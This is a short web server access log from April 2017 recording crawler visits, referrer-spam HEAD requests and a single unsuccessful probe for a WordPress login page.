157.55.39.9 - - [09/Apr/2017:01:15:13 +0200] "GET /pf.gif HTTP/1.1" 200 62 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
195.133.48.150 - - [09/Apr/2017:01:16:27 +0200] "HEAD / HTTP/1.1" 200 - "https://mskunion.ru/" "Mozilla/2.0 (compatible; MSIE7.00; Windows 2007)"
193.124.131.168 - - [09/Apr/2017:01:19:45 +0200] "HEAD / HTTP/1.1" 200 - "http://www.\xd1\x81\xd1\x82\xd1\x80\xd0\xbe\xd0\xb9\xd0\xba\xd0\xb0.kz/catalog/" "Mozilla/7.0 (compatible; MSIE3.00; Windows 2004)"
194.87.238.17 - - [09/Apr/2017:01:21:55 +0200] "HEAD / HTTP/1.1" 200 - "https://anapa777.ru/faq/1666-osyol" "Mozilla/4.0 (compatible; MSIE6.00; Windows 2003)"
180.76.15.151 - - [09/Apr/2017:01:22:57 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
88.99.27.172 - - [09/Apr/2017:01:23:07 +0200] "GET /sonderthemen/az2000.pdf HTTP/1.1" 200 2253581 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
180.76.15.134 - - [09/Apr/2017:01:23:12 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
195.133.147.89 - - [09/Apr/2017:01:24:00 +0200] "HEAD / HTTP/1.1" 200 - "https://www.nochuem.ru" "Mozilla/7.0 (compatible; MSIE4.00; Windows 2005)"
195.133.147.74 - - [09/Apr/2017:01:26:36 +0200] "HEAD / HTTP/1.1" 200 - "https://advocat777.ru/yuristy-kurskaya.html" "Mozilla/5.0 (compatible; MSIE5.00; Windows 2009)"
162.216.46.127 - - [09/Apr/2017:01:30:10 +0200] "GET /wp-login.php HTTP/1.1" 404 2381 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
162.216.46.127 - - [09/Apr/2017:01:30:10 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
194.87.234.246 - - [09/Apr/2017:01:34:10 +0200] "HEAD / HTTP/1.1" 200 - "http://oldtownestate.eu/ru/Catalog/" "Mozilla/7.0 (compatible; MSIE5.00; Windows 2003)"
195.133.147.6 - - [09/Apr/2017:01:39:23 +0200] "HEAD / HTTP/1.1" 200 - "https://petboy.ru/products/18666809" "Mozilla/6.0 (compatible; MSIE3.00; Windows 2008)"
207.46.13.118 - - [09/Apr/2017:01:46:33 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.210.73 - - [09/Apr/2017:01:59:01 +0200] "GET /mv_g.gif HTTP/1.1" 200 4070 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
65.55.210.78 - - [09/Apr/2017:01:59:03 +0200] "GET /cds/simplaydata/controlconfig.xml?nocache=1491646186338 HTTP/1.1" 200 121 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
